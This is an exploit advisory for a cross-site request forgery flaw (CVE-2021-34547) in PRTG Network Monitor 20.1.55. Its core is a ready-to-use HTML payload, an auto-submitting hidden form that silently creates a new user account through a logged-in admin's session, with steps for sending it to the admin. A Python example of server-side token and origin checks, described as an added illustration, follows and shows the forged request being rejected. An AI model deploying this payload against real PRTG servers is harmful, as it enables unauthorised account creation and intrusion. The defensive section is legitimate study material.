PRTG Network Monitor v20.1.55 - CSRF (CVE-2021-34547)
Cross Site Request Forgery (CSRF) on PRTG Network Monitor version 20.1.55
Exploit Title: Cross Site Request Forgery (CSRF)
Date: 10/06/2021
Exploit Author: Likhith CV
Vendor Homepage: https://www.paessler.com/
Software Link: https://www.paessler.com/prtg
Tested on Version: 20.1.55.1775+
Affected Versions: not tested on other versions
CVE assigned: CVE-2021-34547
Observation
It was observed that anti-CSRF tokens are not implemented anywhere in the PRTG Network Monitor v20.1.55 application.
Severity: High
Steps To reproduce:
To exploit this vulnerability, an attacker can simply create an HTML form that submits a user account creation request and share the link with the victim. When the victim clicks the link, the user account creation request is triggered in the background and creates a user account from the victim's valid session.
Any action can be performed on behalf of the logged-in user; for demonstration, user account creation on behalf of the admin is shown as an example.
- Create a CSRF payload as follows:
<html>
<body onload="onLoadSubmit()">
<script>history.pushState('', '', '/')</script>
<form action="https://[domain]/editsettings" name="cu2" method="POST" enctype="multipart/form-data">
<input type="hidden" name="login_" value="User_test2" /> <!--username-->
<input type="hidden" name="name_" value="User_test2" /> <!--name-->
<input type="hidden" name="email_" value="cvlikhith@gmail.com" /> <!--email-->
<input type="hidden" name="email" value="" />
<input type="hidden" name="passwordradio" value="1" />
<input type="hidden" name="password1" value="Hello123" /> <!--password-->
<input type="hidden" name="password_" value="" /> <!--confirm_password-->
<input type="hidden" name="password2" value="Hello123" />
<input type="hidden" name="passhash" value="" />
<input type="hidden" name="lastackedsensordeprecationgrowl" value="" />
<input type="hidden" name="usertype_" value="0" />
<input type="hidden" name="allowack_" value="0" />
<input type="hidden" name="allowpwchange_" value="0" />
<input type="hidden" name="primarygroup_" value="201|PRTG Users Group|||0|" /> <!--group-->
<input type="hidden" name="primarygroup" value="201" />
<input type="hidden" name="active_" value="1" />
<input type="hidden" name="autorefreshtype_" value="1" />
<input type="hidden" name="autorefreshinterval_" value="30" />
<input type="hidden" name="playsound_" value="0" />
<input type="hidden" name="homepage_" value="" />
<input type="hidden" name="timezone_" value="Dateline Standard Time|(UTC-12:00) International Date Line West" />
<input type="hidden" name="dateformat_" value="0" />
<input type="hidden" name="theme_" value="0" />
<input type="hidden" name="ticketmail_" value="1" />
<input type="hidden" name="objecttype" value="user" />
<input type="hidden" name="id" value="new" />
<input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=5" />
<input type="submit" value="Submit request" />
</form>
<script language="javascript">
function onLoadSubmit() {
document.cu2.submit();
}
</script>
</body>
</html>
- Send this payload to the admin of the PRTG portal.
- Once the admin opens the payload, a new user account will be created.
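
A server-side check that would reject the forged form above, given here as an added example (not part of the original advisory and not the vendor's actual fix): a session-bound synchronizer token combined with an Origin/Referer check on state-changing requests. The `csrf_token` field name, the `prtg.example` origin and the session identifiers are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret (assumption)
APP_ORIGIN = "https://prtg.example"       # placeholder origin (assumption)
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}

def issue_token(session_id: str) -> str:
    """Synchronizer token bound to one session: HMAC(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict) -> bool:
    """Check Origin, falling back to Referer, against the app's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN

def check_request(method: str, headers: dict, form: dict, session_id: str):
    """Return (allowed, reason) for one authenticated request."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    if not same_origin(headers):
        return False, "cross-origin or missing Origin/Referer"
    supplied = form.get("csrf_token", "")  # hypothetical hidden field name
    if not hmac.compare_digest(supplied.encode(), issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"

# Constructed sample requests; the admin's browser attaches the session cookie to all.
ADMIN_SESSION = "sess-admin-constructed"
FORGED = ("POST", {"Origin": "https://attacker.example"},
          {"objecttype": "user", "id": "new", "login_": "User_test2"})
NO_TOKEN = ("POST", {"Origin": APP_ORIGIN},
            {"objecttype": "user", "id": "new", "login_": "User_test2"})
LEGIT = ("POST", {"Origin": APP_ORIGIN},
         {"objecttype": "user", "id": "new", "login_": "User_test2",
          "csrf_token": issue_token(ADMIN_SESSION)})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("no token", NO_TOKEN), ("legit", LEGIT)):
        print(name, check_request(*req, ADMIN_SESSION))
```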





